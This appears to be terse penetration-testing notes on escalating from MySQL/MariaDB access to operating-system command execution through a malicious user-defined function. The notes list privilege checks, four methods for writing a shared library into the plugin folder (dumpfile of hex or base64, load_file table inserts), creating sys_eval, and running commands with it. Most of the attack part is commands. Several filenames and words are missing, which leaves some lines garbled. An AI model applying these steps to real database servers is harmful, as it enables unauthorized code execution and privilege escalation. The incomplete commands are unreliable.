It can either exploit a vulnerability or leverage credentials to gain access.
Create a user-defined-function
Do you have write privileges to the db?
Is mysql running as root?
Can you locate the plugin folder?
SHOW GRANTS; <-- show privileges
SHOW VARIABLES; <-- find the plugin directory (blank can mean default location of /usr/lib/)
===== STEP 1 =====
Get your into the plugin folder
Method 1: copy
Copy the into the plugin folder
Method 2: perform a hexdump
od -A n -t x1 | sed 's/ *//g' | tr -d '\n' | xclip
select <hex> into dumpfile "<plugin folder>/";
Method 3: perform a base64 encoded (IF MARIADB 5.6+)
base64 <file> -w 0 > <file>.b64
base64 -w 0 > myudf.b64
cat <file>.b64 | xclip
set @lib = "<base64>";
select from_base64(@lib) into dumpfile "<plugin folder>/";
Method 4: transfer file via table inserts (easiest)
create table foo(line blob);insert into foo values(load_file('/tmp/'));select * from foo into dumpfile "<plugin folder>/";
===== STEP 2 =====
Create the user-defined function
create function sys_eval returns string soname ''; (the function name may change depending on your library)
===== STEP 3 =====
Code execution
select sys_eval('id');
It can help to gain a higher permission access level.
# Same as gain access <-- this is the udf file I used <-- auto exploit, do not use unless you understand all of the above